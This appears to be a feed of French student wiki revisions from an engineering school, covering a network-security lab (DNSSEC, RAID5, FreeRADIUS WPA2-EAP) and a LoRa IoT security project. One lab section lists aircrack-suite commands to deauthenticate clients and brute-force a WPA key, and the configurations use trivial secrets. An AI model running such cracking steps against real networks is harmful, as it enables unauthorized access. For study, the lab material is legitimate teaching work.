 faispastomberlasavo.net. 604800	IN	DNSKEY	256 3 5 AwEAAe+I1C2IYzY323K1HXia8curPC+ZduRAiXpsYMdBRyTQOpxTf0zf ulFh42UOPhRCrYm3CZkOesUjhbS0Z3WVzy6u/RHJDRKiqNUbpnBN8jQf mmhIx8FJU3Kcu5st+T6cRWOEoCQIS6tOM31u5I4NKrhXZamDiV361YTQ nJrJNT//&lt;br /&gt;
 &lt;br /&gt;
 ;; Query time: 0 msec&lt;br /&gt;
 ;; SERVER: 127.0.0.1#53(127.0.0.1)&lt;br /&gt;
 ;; WHEN: Mon Nov 28 17:05:19 CET 2016&lt;br /&gt;
 ;; MSG SIZE  rcvd: 476&lt;br /&gt;
&lt;br /&gt;
==Crack clé WPA/PSK==&lt;br /&gt;
&lt;br /&gt;
Tout d'abord il faut passer l'interface réseau en mode &amp;quot;Monitor&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan1&lt;br /&gt;
&lt;br /&gt;
Nous pouvons détecter les hotspots grâce à l'utilitaire airodump-ng&lt;br /&gt;
&lt;br /&gt;
 airodump-ng --encrypt wpa mon0&lt;br /&gt;
&lt;br /&gt;
Nous voulions trouvé la clé de &amp;quot;cracotte01&amp;quot;, nous avons donc filtré pour le bssid &amp;quot;04:DA:D2:9C:50:50&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -w out --bssid 04:DA:D2:9C:50:50 mon0&lt;br /&gt;
 aireplay-ng -0 0 -a 04:DA:D2:9C:50:50&lt;br /&gt;
&lt;br /&gt;
Nous avons créer notre dictionnaire de la façon suivante&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 0123456789 -o dico.txt&lt;br /&gt;
&lt;br /&gt;
Que nous avons tester sur une Zabeth par soucis de rapidité&lt;br /&gt;
 &lt;br /&gt;
 aircrack-ng -w dico.txt out-01.cap&lt;br /&gt;
&lt;br /&gt;
Qui nous a donné le résultat suivant&lt;br /&gt;
&lt;br /&gt;
 [[Fichier:Aircrack_screen.png|500px|thumb|center]]&lt;br /&gt;
&lt;br /&gt;
==Travail à Réalisé==&lt;br /&gt;
===6.1 Raid===&lt;br /&gt;
&lt;br /&gt;
Tout d'abord il a fallu créer les disques virtuels avec ''lvcreate'' :&lt;br /&gt;
 lvcreate -L 1G -n /dev/virtual/Frotteman-raid1 -v&lt;br /&gt;
 lvcreate -L 1G -n /dev/virtual/Frotteman-raid2 -v&lt;br /&gt;
 lvcreate -L 1G -n /dev/virtual/Frotteman-raid3 -v&lt;br /&gt;
&lt;br /&gt;
Puis il faut rajouter à la config ''/etc/xen/Frotteman.cfg'' :&lt;br /&gt;
&lt;br /&gt;
 'phy:/dev/virtual/Frotteman-raid1,xvdd1, w',&lt;br /&gt;
 'phy:/dev/virtual/Frotteman-raid2,xvdd2, w',&lt;br /&gt;
 'phy:/dev/virtual/Frotteman-raid3,xvdd3, w',&lt;br /&gt;
&lt;br /&gt;
Une fois ceci fait on redémarre la VM et on installe ''mdadm'' :&lt;br /&gt;
&lt;br /&gt;
 apt-get install mdadm&lt;br /&gt;
&lt;br /&gt;
On met à jour les modules du kernel (enfin je crois) :&lt;br /&gt;
&lt;br /&gt;
 apt-get install linux-image.3.16.0-4-amd64&lt;br /&gt;
&lt;br /&gt;
Il ne nous reste plus qu'à créer notre disque RAID5 ''md0'' :&lt;br /&gt;
&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd1 /dev/xvdd2 /dev/xvdd3&lt;br /&gt;
&lt;br /&gt;
Nous installons un système de fichier ''ext4'' dessus:&lt;br /&gt;
&lt;br /&gt;
 mkfs -t ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Nous pouvons maintenant le monter :&lt;br /&gt;
&lt;br /&gt;
 mount /dev/md0 /mnt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour tester nous avons copié en partie le dossier /lib dans /mnt.&lt;br /&gt;
Nous commentons une ligne du fichier /etc/xen/Frotteman.cfg&lt;br /&gt;
&lt;br /&gt;
 #'phy:/dev/virtual/Frotteman-raid2,xvdd2, x',&lt;br /&gt;
&lt;br /&gt;
Puis nous observons les différents résultats via ''fdisk'' :&lt;br /&gt;
&lt;br /&gt;
 fdisk -l&lt;br /&gt;
&lt;br /&gt;
 Disk /dev/xvdd1: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
 Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
 Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
 I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
 Disk /dev/xvdd3: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
 Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
 Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
 I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
 Disk /dev/md0: 2 GiB, 2145386496 bytes, 4190208 sectors&lt;br /&gt;
 Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
 Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
 I/O size (minimum/optimal): 524288 bytes / 1048576 bytes&lt;br /&gt;
&lt;br /&gt;
On observe l'absence du disque xvdd2 mais nous avons en revanche toutes nos données sur /mnt&lt;br /&gt;
&lt;br /&gt;
 root@Frotteman:~# ls /mnt/lib&lt;br /&gt;
 ifupdown			      libipq.so.0.0.0	    startpar&lt;br /&gt;
 init				      libiptc.so.0	    systemd&lt;br /&gt;
 klibc-IpHGKKbZiB_yZ7GPagmQz2GwVAQ.so  libiptc.so.0.0.0	    terminfo&lt;br /&gt;
 libip4tc.so.0			      libxtables.so.10	    udev&lt;br /&gt;
 libip4tc.so.0.1.0		      libxtables.so.10.0.0  x86_64-linux-gnu&lt;br /&gt;
 libip6tc.so.0			      lsb		    xtables&lt;br /&gt;
 libip6tc.so.0.1.0		      modprobe.d&lt;br /&gt;
 libipq.so.0			      modules&lt;br /&gt;
&lt;br /&gt;
Nous avons même été prévenu via mail par mdadm, c'est bo l'info !!&lt;br /&gt;
&lt;br /&gt;
 From root@faispastomberlasavo.net  Wed Dec  7 17:06:00 2016&lt;br /&gt;
 X-Original-To: root&lt;br /&gt;
 From: mdadm monitoring &amp;lt;root@faispastomberlasavo.net&amp;gt;&lt;br /&gt;
 To: root@faispastomberlasavo.net&lt;br /&gt;
 Subject: DegradedArray event on /dev/md0:Frotteman&lt;br /&gt;
 Date: Wed,  7 Dec 2016 17:05:56 +0100 (CET)&lt;br /&gt;
 &lt;br /&gt;
 This is an automatically generated mail message from mdadm&lt;br /&gt;
 running on Frotteman&lt;br /&gt;
 &lt;br /&gt;
 A DegradedArray event had been detected on md device /dev/md0.&lt;br /&gt;
 &lt;br /&gt;
 Faithfully yours, etc.&lt;br /&gt;
 &lt;br /&gt;
 P.S. The /proc/mdstat file currently contains the following:&lt;br /&gt;
 &lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active (auto-read-only) raid5 xvdd1[0] xvdd3[2]&lt;br /&gt;
       2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
       &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===6.2 Cryptage eeePC===&lt;br /&gt;
&lt;br /&gt;
===6.6 Securasition Wifi par WPA2-EAP===&lt;br /&gt;
 &lt;br /&gt;
 default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
 Puis nous avons eu à configurer nos points d'accès wifi au sein du fichier clients.conf, voici à quoi ressemble la configuration d'un des points :&lt;br /&gt;
&lt;br /&gt;
 client E306{&lt;br /&gt;
         ipaddr = 10.60.1.2&lt;br /&gt;
         secret = password&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
Pour finir il ne restait plus qu'a créer un utilisateur pour ce serveur d'authentification, pour cela nous avons ajouté la ligne suivante dans le fichier users.&lt;br /&gt;
&lt;br /&gt;
 frotteman Cleartext-Password := &amp;quot;youpi&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Une fois cette configuration réalisée nous avons lancé notre serveur FreeRADIUS.&lt;br /&gt;
Configuration des bornes Wi-Fi&lt;br /&gt;
&lt;br /&gt;
Par la suite nous avons réalisé la configuration des bornes Wi-Fi afin d'avoir notre accès sécurisé avec notre serveur FreeRADIUS. La configuation est réalisée en tapant les commandes suivantes après s'être connecté à la borne via telnet :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 &lt;br /&gt;
 aaa new-model&lt;br /&gt;
 aaa authentication login eap_frotteman group radius_frotteman&lt;br /&gt;
 radius-server host 193.48.57.161 auth-port 1812 acct-port 1813 key password&lt;br /&gt;
 aaa group server radius radius_frotteman&lt;br /&gt;
 server 193.48.57.161 auth-port 1812 acct-port 1813&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
 dot11 ssid SSID_FROTTEMAN&lt;br /&gt;
 vlan 2&lt;br /&gt;
 authentication open eap eap_frotteman&lt;br /&gt;
 authentication network-eap eap_frotteman&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 &lt;br /&gt;
 exit &lt;br /&gt;
 &lt;br /&gt;
 interface Dot11Radio0&lt;br /&gt;
 encryption vlan 2 mode ciphers aes-ccm tkip&lt;br /&gt;
 ssid SSID_FROTTEMAN &lt;br /&gt;
 &lt;br /&gt;
 exit &lt;br /&gt;
 &lt;br /&gt;
 interface Dot11Radio0.2&lt;br /&gt;
 encapsulation dot1Q 2&lt;br /&gt;
 no ip route-cache&lt;br /&gt;
 bridge-group 2&lt;br /&gt;
 bridge-group 2 subscriber-loop-control&lt;br /&gt;
 bridge-group 2 spanning-disabled&lt;br /&gt;
 bridge-group 2 block-unknown-source&lt;br /&gt;
 no bridge-group 2 source-learning&lt;br /&gt;
 no bridge-group 2 unicast-flooding  &lt;br /&gt;
 &lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
 interface GigabitEthernet0.2&lt;br /&gt;
 encapsulation dot1Q 2&lt;br /&gt;
 bridge-group 2&lt;br /&gt;
 &lt;br /&gt;
 exit&lt;br /&gt;
  &lt;br /&gt;
 exit&lt;/div&gt;</summary>
		<author><name>Cduval</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=P64_S%C3%A9curit%C3%A9_de_l%27IOT&amp;diff=35760</id>
		<title>P64 Sécurité de l'IOT</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=P64_S%C3%A9curit%C3%A9_de_l%27IOT&amp;diff=35760"/>
				<updated>2016-12-08T09:50:15Z</updated>
		
		<summary type="html">&lt;p&gt;Cduval : /* Changement de fréquence */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Objectif du PFE=&lt;br /&gt;
&lt;br /&gt;
L’internet des objets (IoT) se démocratise de plus en plus dans nos appareils électroniques et la question de la sécurité se pose. Si un de ces objets connait une défaillance, l’ensemble des données lié à son réseau pourrait être compromises.&lt;br /&gt;
L’objectif de ce PFE est d’analyser le protocole réseau LORA et de déceler les failles de sécurité afin de les corriger.&lt;br /&gt;
&lt;br /&gt;
=Réseau LoRa=&lt;br /&gt;
&lt;br /&gt;
Le réseau LoRa ( Long Range ) est une technologie permettant aux objets connectés d’échanger des données de petites tailles. Le débit du réseau varie de 0,3 kb/s à 50 kb/s. La première utilité est que la consommation des objets est très faible garantissant une autonomie allant jusqu’à 10 ans. La portée maximale est d’environ 20km.&lt;br /&gt;
L'architecture du réseau LoRaWan est utilisée sous forme de réseau hiérarchique où chaque passerelle peut transmettre les messages entre les appareils terminaux et un serveur de réseau central en arrière-plan.&lt;br /&gt;
&lt;br /&gt;
Le protocole LoRa a 3 modes de fonctionnement:&lt;br /&gt;
&lt;br /&gt;
*L’envoi d’informations vers une antenne puis la réception d’informations immédiatement après. Le serveur ne pourra envoyer d’informations qu’au prochain cycle d’envoi. Ce mode à la moins grande consommation d’énergie et permet d’envoyer des données de manière régulière ( ex: capteur).  La portée maximale est d’environ 20 km en zone rurale et 1 km en zone urbaine.&lt;br /&gt;
&lt;br /&gt;
*La réception de données à intervalles réguliers et paramétrés à l’avance.&lt;br /&gt;
&lt;br /&gt;
* La réception d’informations en continu, c’est le mode qui consomme le plus.&lt;br /&gt;
&lt;br /&gt;
L’alliance LoRa a publié un programme de certification obligatoire consistant à vérifier que l’objet connecté répond aux contraintes fonctionnelles du standard LoRaWAN.&lt;br /&gt;
 &lt;br /&gt;
La bande utilisée est 868 MHz et 900 MHZ. Elle est assez large pour protéger le signal des interférences dù à l’environnement.&lt;br /&gt;
&lt;br /&gt;
==Composants du réseau LoRa==&lt;br /&gt;
&lt;br /&gt;
La solution LoRa est constitué de Nodes (noeuds) et de Gateways (passerelles) qui communiquent avec le serveur réseau. &lt;br /&gt;
&lt;br /&gt;
*Les noeuds sont utilisés pour mesurer des valeurs ou contrôler des systèmes externes. Ils ont une faible alimentation et communiquent par réseau sans fil avec un ou plusieurs passerelles. Les noeuds sont équipés d’un transmetteur LoRa géré par un microcontrôleur. Le microcontrôleur peut envoyer des commandes au transmetteur pour configurer les paramètres du réseau LoRa ou envoyer et recevoir des données d’application que le transmetteur enverra au réseau serveur par la passerelle.&lt;br /&gt;
Les noeuds sont usuellement en mode “call then listen”, ce qui veut dire que le noeud enverra des données au serveur et écoutera pendant une courte durée la réponse du serveur.&lt;br /&gt;
&lt;br /&gt;
*Les passerelles sont moins nombreuses et transfèrent les données depuis les noeuds jusqu’au serveur réseau en utilisant des connections IP standards. &lt;br /&gt;
La solution LoRa a donc une topologie “star of star”; où plusieurs noeuds communiquent à une ou plusieurs passerelles, qui communiquent à un serveur réseau unique.&lt;br /&gt;
Les passerelles n’ont pas de mesures de sécurités mais fonctionnent comme un tunnel entre les noeuds et le serveur.&lt;br /&gt;
&lt;br /&gt;
*Le serveur réseau représente le stockage des données envoyées depuis les noeuds. Il est la plupart du temps une interface web où les passerelles se connectent en utilisant le réseau cellulaire.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Schéma lora.png|600px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==LoRa Frame structure==&lt;br /&gt;
&lt;br /&gt;
La transmission d’un noeud à une passerelle est appelée uplink (liaison montante) et de la passerelle à un noeud downlink ( liaison descendante). Il y a 3 classes de réseau LoRaWAn : classe A, B et C. Les classes ont des frames différentes de uplink et downlink.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe A sont ceux qui consomment le moins niveau énergétique.&lt;br /&gt;
Lorsqu’un uplink est transmis, 2 fenêtres de downlink sont envoyés en réponse. La fréquence des transmissions est défini par le noeud.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe B sont similaires aux classes A mais ont plus de fenêtres de downlink, définis par les passerelles.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe C sont en écoute permanente et sont donc toujours en downlink lorsqu’ils n’émettent pas en uplink. C’est le mode le plus consommateur en énergie mais il a moins de latence comparé aux autres pour la communication entre noeud et serveur.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Frame lora.PNG]]&lt;br /&gt;
&lt;br /&gt;
==Pile de protocole LoRa==&lt;br /&gt;
&lt;br /&gt;
La pile de protocole LoRa est composée de 4 couches : &lt;br /&gt;
&lt;br /&gt;
* Couche Application LoRa &lt;br /&gt;
&lt;br /&gt;
* Couche MAC LoRa&lt;br /&gt;
&lt;br /&gt;
* Couche Physique LoRa&lt;br /&gt;
&lt;br /&gt;
* Couche RF LoRa&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Couche lora.PNG]]&lt;br /&gt;
&lt;br /&gt;
La couche MAC contient les données relatives à la classe du noeud et varie selon son type.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Lora phy layer.PNG]]&lt;br /&gt;
&lt;br /&gt;
La couche physique construit le paquet pour transmettre l'information de la couche MAC à la couche radio.&lt;br /&gt;
La couche Radio PHY contient un préambule ( 8 octets ), un entête et des contrôles de redondance cycliques pour le PHY Payload et l’entête.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La couche PHY Payload commence par un entête MAC suivi d'un MAC Payload et d’un check d’intégrité du paquet. L’entête et le Payload contiennent les données de l’utilisateur plus des informations relatives au type de message et sur la version LoRa utilisée.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le Payload MAC est constitué d'un entête comportant les adresses de la source et de la destination ainsi qu'un frame counter pour protéger le message. Il est aussi formé d'un Frame port et d'un Frame Pyload qui contiennent les données de l'application. Le Frame Port est aussi utilisé pour déterminer si le message contient seulement des commandes MAC ou des données spécifiques à l'application.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Schéma de la communication==&lt;br /&gt;
[[Fichier:Schéma com lora.png]]&lt;br /&gt;
&lt;br /&gt;
==Matériel==&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
 {| class=&amp;quot;wikitable alternance centre&amp;quot;&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
 ! Matériel !! Quantité !!Prix à l'unité !! Prix Total !! URL !! statut&lt;br /&gt;
|-&lt;br /&gt;
 ! RF Adafruit Feather M0 RFM96 &lt;br /&gt;
 | 3&lt;br /&gt;
 | 31,97 € &lt;br /&gt;
 | 95.91€  &lt;br /&gt;
 |http://www.mouser.fr/ProductDetail/Adafruit/3179/?qs=sGAEpiMZZMuC4zZxLL0ZTXmUcMwoRc9uEac7jsWPYbgAg4D4CJduaQ%3d%3d&lt;br /&gt;
 |Recu&lt;br /&gt;
 |-&lt;br /&gt;
! Raspberry PI&lt;br /&gt;
 | 3&lt;br /&gt;
 | 31,41 € &lt;br /&gt;
 | 94.23 € &lt;br /&gt;
 | http://fr.farnell.com/raspberry-pi/raspberrypi-modb-1gb/raspberry-pi-3-model-b/dp/2525225&lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 ! Carte SD 4 Go &lt;br /&gt;
 | 3&lt;br /&gt;
 | 14,58 € &lt;br /&gt;
 | 43.74 € &lt;br /&gt;
 | http://fr.farnell.com/transcend/ts4gsdhc10/carte-sdhc-4gb-classe-10/dp/2290237 &lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 ! Alimentation Raspberry Pi &lt;br /&gt;
 | 3&lt;br /&gt;
 | 8,05 € &lt;br /&gt;
 | 24,15 € &lt;br /&gt;
 | http://fr.farnell.com/stontronics/t6090dv/psu-raspberry-pi-5v-2-5a-uk-euro/dp/2520786 &lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 &lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
= Montage =&lt;br /&gt;
&lt;br /&gt;
==Communication== &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Les Feather LoRa reçus, j'ai commencé à souder des fils de 16.5cm (pour 433 MHz) de long pour qu'ils servent d'antenne.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:antenne.jpg|600px]]&lt;br /&gt;
&lt;br /&gt;
J'ai commencé par prendre l'exemple fourni par le site adafruit pour voir si les modules fonctionnaient correctement.&lt;br /&gt;
&lt;br /&gt;
En utilisant un module comme émetteur et un autre comme récepteur, on obtient ces résultats :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Transmission.PNG|550px]]&lt;br /&gt;
[[Fichier:Reception.PNG|550px]]&lt;br /&gt;
&lt;br /&gt;
Les modules communiquent bien et se répondent.&lt;br /&gt;
&lt;br /&gt;
Les messages sont envoyés en clair et peuvent être  interceptés par tout le monde et dans un grand périmètre puisque la portée peut être de plusieurs kilomètres.&lt;br /&gt;
&lt;br /&gt;
De ce programme, j'ai déduit plusieurs fonctionnalités pour sécuriser la liaison.&lt;br /&gt;
&lt;br /&gt;
== Changement de fréquence==&lt;br /&gt;
&lt;br /&gt;
La fréquence du module LoRa est prévu pour 433 MHz. Cependant j'ai pu noter que changer cette fréquence pour l'émetteur et le récepteur garantissait toujours un bon fonctionnement si on ne dépasse pas certaines valeurs. D'après quelques tests, la plaque de fréquence peut varier de 390 à 550 MHz (faire plus de tests pour trouver les limites). &lt;br /&gt;
&lt;br /&gt;
Mais le récepteur et le transmetteur doivent être sur la même fréquence à 0.02 MHz près. On peut en déduire plusieurs centaines plages de fréquence juste pour le module 433 MHz.&lt;br /&gt;
&lt;br /&gt;
Un désavantage de cacher ces messages dans des fréquences précises est que si l'émetteur transmet des paquets en continu, on peut scanner certaines fréquences jusqu'à recevoir un paquet et connaître la fréquence précise. Cependant, les module LoRa émettent rarement en continu mais plutôt à des  temps définis et très peu de paquets.&lt;br /&gt;
&lt;br /&gt;
J'ai réalisé un programme permettant de scanner des bandes de fréquence afin de voir si des paquets sont transmis. En attendant 3 secondes par fréquence et en changeant de 0.02 MHz, on scanne 1 MHz toutes les 2m30s. &lt;br /&gt;
&lt;br /&gt;
Pour scanner une plage de 100 MHz, on met à peu près 4h5m.&lt;br /&gt;
Si un émetteur transmet en continu on peut trouver la fréquence dans un temps raisonnable. Si l'émetteur transmet seulement toutes les heures, le temps devient beaucoup plus long.&lt;br /&gt;
&lt;br /&gt;
==Authentification ==&lt;br /&gt;
&lt;br /&gt;
Un problème pouvant survenir lorsque plusieurs récepteurs sont allumés et que des transmissions arrivent est que les récepteurs ne sauront pas à qui est destiné le paquet.&lt;br /&gt;
&lt;br /&gt;
===Authentification en 1 étape===&lt;br /&gt;
&lt;br /&gt;
L'émetteur envoie un paquet avec son adresse, l'adresse de destination, puis le message. Le récepteur peut checker si le message lui est dédié et par qui il est envoyé. &lt;br /&gt;
&lt;br /&gt;
Le désavantage est que si quelqu'un intercepte le message, il connaît les adresses des modules et peut envoyer des paquets en se faisant passer pour un émetteur. &lt;br /&gt;
 &lt;br /&gt;
=== Authentification en 2 étapes ===&lt;br /&gt;
&lt;br /&gt;
J'ai créée un programme pour que l'émetteur et le récepteur aient une adresse définie à l'avance et ne puissent parler qu'entre eux.&lt;br /&gt;
&lt;br /&gt;
L'émetteur envoie un paquet contenant l'adresse du récepteur. Si le récepteur reçoit le paquet et que l'adresse correspond à la sienne, il renvoie un paquet avec l'adresse de l'émetteur.&lt;br /&gt;
&lt;br /&gt;
L'émetteur ayant reconnu son adresse, il envoie le paquet contenant le message et le récepteur peut stocker les informations reçus.&lt;br /&gt;
&lt;br /&gt;
Ce programme n'a été réalisé qu'entre 2 modules. Le premier problème est que si plusieurs émetteurs doivent envoyer des paquets au même récepteur, il ne sait pas quel émetteur lui a envoyé un paquet. &lt;br /&gt;
&lt;br /&gt;
Il faudrait donc qu'un récepteur ait seulement un émetteur affilié. De plus les adresses circulent en clair et quelqu'un peut recevoir les adresses et envoyer des paquets aux modules en essayant de deviner si l'adresse est au récepteur ou à l'émetteur.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Disponibilité==&lt;br /&gt;
&lt;br /&gt;
Si un module est en panne ou rencontre un bug, il peut y avoir perte d'informations. Une solution pour éviter ce genre d'incident et de vérifier si le paquet est correctement reçu si le récepteur est en panne. Une réponse du récepteur vers l'émetteur serait obligatoire pour s'assurer que l'émetteur n'envoie pas dans le vide.&lt;br /&gt;
&lt;br /&gt;
Si l'émetteur n'a pas de paquet de confirmation, il envoie un paquet à un module dédié au report de panne pour lui informer que son paquet à destination de l'émetteur a rencontré un problème.&lt;br /&gt;
&lt;br /&gt;
Si c'est l'émetteur qui rencontre un problème, le récepteur ne peut pas savoir qu'il est en panne à moins qu'il vérifie l'état de ses émetteurs toutes les X minutes.S'il n'y a pas de réponses il envoie un paquet au module dédié au report de panne.&lt;br /&gt;
&lt;br /&gt;
Dans un cas plus simple où l'on pourrait faire fonctionner les modules assez fréquemment, on pourrait imaginer un système ou tous les modules envoient un paquet au module de report de panne. Le module de report compare avec sa base de données de modules et indique lorsqu'un module ne lui a pas fait signe depuis plus de X minutes.&lt;br /&gt;
&lt;br /&gt;
==Intégrité des paquets==&lt;br /&gt;
&lt;br /&gt;
Les paquets doivent être vérifiés pour être sur qu'ils ne soient pas corrompus. Lorsqu'un paquet est envoyé au récepteur, le récepteur renvoie le paquet à l'émetteur et celui-ci vérifie s'il est conforme à celui envoyé et renvoie le paquet s'il n'est pas conforme.&lt;/div&gt;</summary>
		<author><name>Cduval</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=P64_S%C3%A9curit%C3%A9_de_l%27IOT&amp;diff=35705</id>
		<title>P64 Sécurité de l'IOT</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=P64_S%C3%A9curit%C3%A9_de_l%27IOT&amp;diff=35705"/>
				<updated>2016-12-07T13:02:12Z</updated>
		
		<summary type="html">&lt;p&gt;Cduval : /* Intégrité des paquets */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Objectif du PFE=&lt;br /&gt;
&lt;br /&gt;
L’internet des objets (IoT) se démocratise de plus en plus dans nos appareils électroniques et la question de la sécurité se pose. Si un de ces objets connait une défaillance, l’ensemble des données lié à son réseau pourrait être compromises.&lt;br /&gt;
L’objectif de ce PFE est d’analyser le protocole réseau LORA et de déceler les failles de sécurité afin de les corriger.&lt;br /&gt;
&lt;br /&gt;
=Réseau LoRa=&lt;br /&gt;
&lt;br /&gt;
Le réseau LoRa ( Long Range ) est une technologie permettant aux objets connectés d’échanger des données de petites tailles. Le débit du réseau varie de 0,3 kb/s à 50 kb/s. La première utilité est que la consommation des objets est très faible garantissant une autonomie allant jusqu’à 10 ans. La portée maximale est d’environ 20km.&lt;br /&gt;
L'architecture du réseau LoRaWan est utilisée sous forme de réseau hiérarchique où chaque passerelle peut transmettre les messages entre les appareils terminaux et un serveur de réseau central en arrière-plan.&lt;br /&gt;
&lt;br /&gt;
Le protocole LoRa a 3 modes de fonctionnement:&lt;br /&gt;
&lt;br /&gt;
*L’envoi d’informations vers une antenne puis la réception d’informations immédiatement après. Le serveur ne pourra envoyer d’informations qu’au prochain cycle d’envoi. Ce mode à la moins grande consommation d’énergie et permet d’envoyer des données de manière régulière ( ex: capteur).  La portée maximale est d’environ 20 km en zone rurale et 1 km en zone urbaine.&lt;br /&gt;
&lt;br /&gt;
*La réception de données à intervalles réguliers et paramétrés à l’avance.&lt;br /&gt;
&lt;br /&gt;
* La réception d’informations en continu, c’est le mode qui consomme le plus.&lt;br /&gt;
&lt;br /&gt;
L’alliance LoRa a publié un programme de certification obligatoire consistant à vérifier que l’objet connecté répond aux contraintes fonctionnelles du standard LoRaWAN.&lt;br /&gt;
 &lt;br /&gt;
La bande utilisée est 868 MHz et 900 MHZ. Elle est assez large pour protéger le signal des interférences dù à l’environnement.&lt;br /&gt;
&lt;br /&gt;
==Composants du réseau LoRa==&lt;br /&gt;
&lt;br /&gt;
La solution LoRa est constitué de Nodes (noeuds) et de Gateways (passerelles) qui communiquent avec le serveur réseau. &lt;br /&gt;
&lt;br /&gt;
*Les noeuds sont utilisés pour mesurer des valeurs ou contrôler des systèmes externes. Ils ont une faible alimentation et communiquent par réseau sans fil avec un ou plusieurs passerelles. Les noeuds sont équipés d’un transmetteur LoRa géré par un microcontrôleur. Le microcontrôleur peut envoyer des commandes au transmetteur pour configurer les paramètres du réseau LoRa ou envoyer et recevoir des données d’application que le transmetteur enverra au réseau serveur par la passerelle.&lt;br /&gt;
Les noeuds sont usuellement en mode “call then listen”, ce qui veut dire que le noeud enverra des données au serveur et écoutera pendant une courte durée la réponse du serveur.&lt;br /&gt;
&lt;br /&gt;
*Les passerelles sont moins nombreuses et transfèrent les données depuis les noeuds jusqu’au serveur réseau en utilisant des connections IP standards. &lt;br /&gt;
La solution LoRa a donc une topologie “star of star”; où plusieurs noeuds communiquent à une ou plusieurs passerelles, qui communiquent à un serveur réseau unique.&lt;br /&gt;
Les passerelles n’ont pas de mesures de sécurités mais fonctionnent comme un tunnel entre les noeuds et le serveur.&lt;br /&gt;
&lt;br /&gt;
*Le serveur réseau représente le stockage des données envoyées depuis les noeuds. Il est la plupart du temps une interface web où les passerelles se connectent en utilisant le réseau cellulaire.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Schéma lora.png|600px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==LoRa Frame structure==&lt;br /&gt;
&lt;br /&gt;
La transmission d’un noeud à une passerelle est appelée uplink (liaison montante) et de la passerelle à un noeud downlink ( liaison descendante). Il y a 3 classes de réseau LoRaWAn : classe A, B et C. Les classes ont des frames différentes de uplink et downlink.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe A sont ceux qui consomment le moins niveau énergétique.&lt;br /&gt;
Lorsqu’un uplink est transmis, 2 fenêtres de downlink sont envoyés en réponse. La fréquence des transmissions est défini par le noeud.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe B sont similaires aux classes A mais ont plus de fenêtres de downlink, définis par les passerelles.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe C sont en écoute permanente et sont donc toujours en downlink lorsqu’ils n’émettent pas en uplink. C’est le mode le plus consommateur en énergie mais il a moins de latence comparé aux autres pour la communication entre noeud et serveur.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Frame lora.PNG]]&lt;br /&gt;
&lt;br /&gt;
==Pile de protocole LoRa==&lt;br /&gt;
&lt;br /&gt;
La pile de protocole LoRa est composée de 4 couches : &lt;br /&gt;
&lt;br /&gt;
* Couche Application LoRa &lt;br /&gt;
